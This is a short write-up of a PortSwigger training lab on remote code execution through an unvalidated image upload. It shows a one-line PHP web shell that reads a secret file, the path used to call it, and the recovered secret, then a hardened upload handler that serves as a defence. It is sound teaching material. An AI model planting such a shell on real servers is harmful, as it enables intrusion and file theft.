apsyleg · 1 min read
#portswigger #file-upload #rce #web-security
Remote Code Execution via Web Shell Upload
Lab
Remote code execution via web shell upload · Apprentice
Solution
Given
This lab contains a vulnerable image upload function. It doesn't perform any
validation on the files users upload before storing them on the server's filesystem.
To solve the lab, upload a basic PHP web shell and use it to exfiltrate the
contents of the file /home/carlos/secret. Submit this secret using the button
provided in the lab banner.
You can log in to your own account using the following credentials: wiener:peter
Analysis and recon
Straightforward — upload a shell and call it in the browser.
<?php echo file_get_contents('/home/carlos/secret'); ?>
Log in, upload the shell.
Open /files/avatars/shell.php in the browser.
1bfoduHLVPomAxIanAVE6dzD1ulBhDVk
Lab solved!
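The lab works because the upload function stores whatever it receives, under the name the client chose, in a directory where PHP files are executed. The handler below is an added example of the missing server-side checks; it is not the lab's code or anything from PortSwigger. The storage path, size limit, function name and the "avatar" form field are assumptions.

```php
<?php
declare(strict_types=1);

// Hypothetical storage location outside the web root, so nothing stored
// here maps to a URL that the PHP interpreter would handle.
const AVATAR_DIR = '/var/app-data/avatars';
const MAX_BYTES  = 1048576; // 1 MiB, assumed limit

// Allowlist: detected MIME type => extension assigned by the server.
const ALLOWED = ['image/jpeg' => 'jpg', 'image/png' => 'png'];

function store_avatar(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }

    // Detect the type from the file's bytes. The client-supplied
    // $file['type'] and $file['name'] are never trusted.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!is_string($mime) || !isset(ALLOWED[$mime])
        || getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not an accepted image');
    }

    // Server-generated name with an allowlisted extension: the uploaded
    // "shell.php" name never reaches the filesystem.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
    if (!move_uploaded_file($file['tmp_name'], AVATAR_DIR . '/' . $name)) {
        throw new RuntimeException('could not store file');
    }
    return $name;
}

// Assumed form field name: "avatar".
if (isset($_FILES['avatar'])) {
    try {
        echo 'stored as ', store_avatar($_FILES['avatar']);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'rejected: ', $e->getMessage();
    }
}
```

Content checks alone can be passed by a file that is both a valid image and contains PHP, so the controls that matter most here are the server-chosen extension and a storage directory where scripts are never executed.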